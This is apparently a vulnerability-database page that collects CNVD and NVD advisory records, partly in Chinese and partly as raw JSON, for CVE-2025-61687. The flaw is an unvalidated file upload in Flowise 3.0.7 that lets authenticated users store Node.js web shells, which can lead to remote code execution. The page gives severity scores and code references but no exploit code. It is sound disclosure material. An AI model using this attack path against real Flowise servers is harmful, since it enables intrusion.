"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "FlowiseAI/Flosise has File Upload vulnerability"
}
CNVD-2025-24788
Vulnerability from cnvd - Published: 2025-10-24
VLAI Severity ?
Title
Flowise文件上传漏洞(CNVD-2025-24788)
Description
Flowise是FlowiseAI开源的一个用于轻松构建LLM应用程序的工具。
Flowise 3.0.7版本存在文件上传漏洞,该漏洞源于文件上传过程中未验证文件扩展名、MIME类型或文件内容,攻击者可利用该漏洞导致远程代码执行。
Severity
高
Patch Name
Flowise文件上传漏洞(CNVD-2025-24788)的补丁
Patch Description
Flowise是FlowiseAI开源的一个用于轻松构建LLM应用程序的工具。
Flowise 3.0.7版本存在文件上传漏洞,该漏洞源于文件上传过程中未验证文件扩展名、MIME类型或文件内容,攻击者可利用该漏洞导致远程代码执行。目前,供应商发布了安全公告及相关补丁信息,修复了此漏洞。
Formal description
厂商已发布了漏洞修复程序,请及时关注更新: https://github.com/FlowiseAI/Flowise/releases
Reference
https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/components/src/storageUtils.ts#L1104-L1111
Impacted products
| Name | FlowiseAI Flowise 3.0.7 |
|---|
{
"cves": {
"cve": {
"cveNumber": "CVE-2025-61687",
"cveUrl": "https://nvd.nist.gov/vuln/detail/CVE-2025-61687"
}
},
"description": "Flowise\u662fFlowiseAI\u5f00\u6e90\u7684\u4e00\u4e2a\u7528\u4e8e\u8f7b\u677e\u6784\u5efaLLM\u5e94\u7528\u7a0b\u5e8f\u7684\u5de5\u5177\u3002\n\nFlowise 3.0.7\u7248\u672c\u5b58\u5728\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u6e90\u4e8e\u6587\u4ef6\u4e0a\u4f20\u8fc7\u7a0b\u4e2d\u672a\u9a8c\u8bc1\u6587\u4ef6\u6269\u5c55\u540d\u3001MIME\u7c7b\u578b\u6216\u6587\u4ef6\u5185\u5bb9\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u5bfc\u81f4\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u3002",
"formalWay": "\u5382\u5546\u5df2\u53d1\u5e03\u4e86\u6f0f\u6d1e\u4fee\u590d\u7a0b\u5e8f\uff0c\u8bf7\u53ca\u65f6\u5173\u6ce8\u66f4\u65b0\uff1a\r\nhttps://github.com/FlowiseAI/Flowise/releases",
"isEvent": "\u901a\u7528\u8f6f\u786c\u4ef6\u6f0f\u6d1e",
"number": "CNVD-2025-24788",
"openTime": "2025-10-24",
"patchDescription": "Flowise\u662fFlowiseAI\u5f00\u6e90\u7684\u4e00\u4e2a\u7528\u4e8e\u8f7b\u677e\u6784\u5efaLLM\u5e94\u7528\u7a0b\u5e8f\u7684\u5de5\u5177\u3002\r\n\r\nFlowise 3.0.7\u7248\u672c\u5b58\u5728\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u6e90\u4e8e\u6587\u4ef6\u4e0a\u4f20\u8fc7\u7a0b\u4e2d\u672a\u9a8c\u8bc1\u6587\u4ef6\u6269\u5c55\u540d\u3001MIME\u7c7b\u578b\u6216\u6587\u4ef6\u5185\u5bb9\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u5bfc\u81f4\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u3002\u76ee\u524d\uff0c\u4f9b\u5e94\u5546\u53d1\u5e03\u4e86\u5b89\u5168\u516c\u544a\u53ca\u76f8\u5173\u8865\u4e01\u4fe1\u606f\uff0c\u4fee\u590d\u4e86\u6b64\u6f0f\u6d1e\u3002",
"patchName": "Flowise\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\uff08CNVD-2025-24788\uff09\u7684\u8865\u4e01",
"products": {
"product": "FlowiseAI Flowise 3.0.7"
},
"referenceLink": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/components/src/storageUtils.ts#L1104-L1111",
"serverity": "\u9ad8",
"submitTime": "2025-10-21",
"title": "Flowise\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\uff08CNVD-2025-24788\uff09"
}
FKIE_CVE-2025-61687
Vulnerability from fkie_nvd - Published: 2025-10-06 16:15 - Updated: 2025-10-16 18:12
Severity ?
8.3 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Summary
Flowise is a drag & drop user interface to build a customized large language model flow. A file upload vulnerability in version 3.0.7 of FlowiseAI allows authenticated users to upload arbitrary files without proper validation. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE). The system fails to validate file extensions, MIME types, or file content during uploads. As a result, malicious scripts such as Node.js-based web shells can be uploaded and stored persistently on the server. These shells expose HTTP endpoints capable of executing arbitrary commands if triggered. The uploaded shell does not automatically execute, but its presence allows future exploitation via administrator error or chained vulnerabilities. This presents a high-severity threat to system integrity and confidentiality. As of time of publication, no known patched versions are available.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:flowiseai:flowise:3.0.7:*:*:*:*:*:*:*",
"matchCriteriaId": "E101AC09-6DF5-4FA1-853F-6CD805A8122F",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Flowise is a drag \u0026 drop user interface to build a customized large language model flow. A file upload vulnerability in version 3.0.7 of FlowiseAI allows authenticated users to upload arbitrary files without proper validation. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE). The system fails to validate file extensions, MIME types, or file content during uploads. As a result, malicious scripts such as Node.js-based web shells can be uploaded and stored persistently on the server. These shells expose HTTP endpoints capable of executing arbitrary commands if triggered. The uploaded shell does not automatically execute, but its presence allows future exploitation via administrator error or chained vulnerabilities. This presents a high-severity threat to system integrity and confidentiality. As of time of publication, no known patched versions are available."
}
],
"id": "CVE-2025-61687",
"lastModified": "2025-10-16T18:12:37.330",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.5,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2025-10-06T16:15:35.223",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Product"
],
"url": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/components/src/storageUtils.ts#L1104-L1111"
},
{
"source": "security-advisories@github.com",
"tags": [
"Product"
],
"url": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/components/src/storageUtils.ts#L170-L175"
},
{
"source": "security-advisories@github.com",
"tags": [
"Product"
],
"url": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/components/src/storageUtils.ts#L533-L541"
},
{
"source": "security-advisories@github.com",
"tags": [
"Product"
],
"url": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/controllers/attachments/index.ts#L4-L11"
},
{
"source": "security-advisories@github.com",
"tags": [
"Product"
],
"url": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/routes/attachments/index.ts#L8"
},
{
"source": "security-advisories@github.com",
"tags": [
"Product"
],
"url": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/services/attachments/index.ts#L7-L16"
},
{
"source": "security-advisories@github.com",
"tags": [
"Product"
],
"url": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/utils/createAttachment.ts#L118-L126"
},
{
"source": "security-advisories@github.com",
"tags": [
"Product"
],
"url": "https://github.com/FlowiseAI/Flowise/blob/d29db16bfcf9a4be8febc3d19d52263e8c3d0055/packages/server/src/utils/index.ts#L1950-L1954"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-35g6-rrw3-v6xc"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-434"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…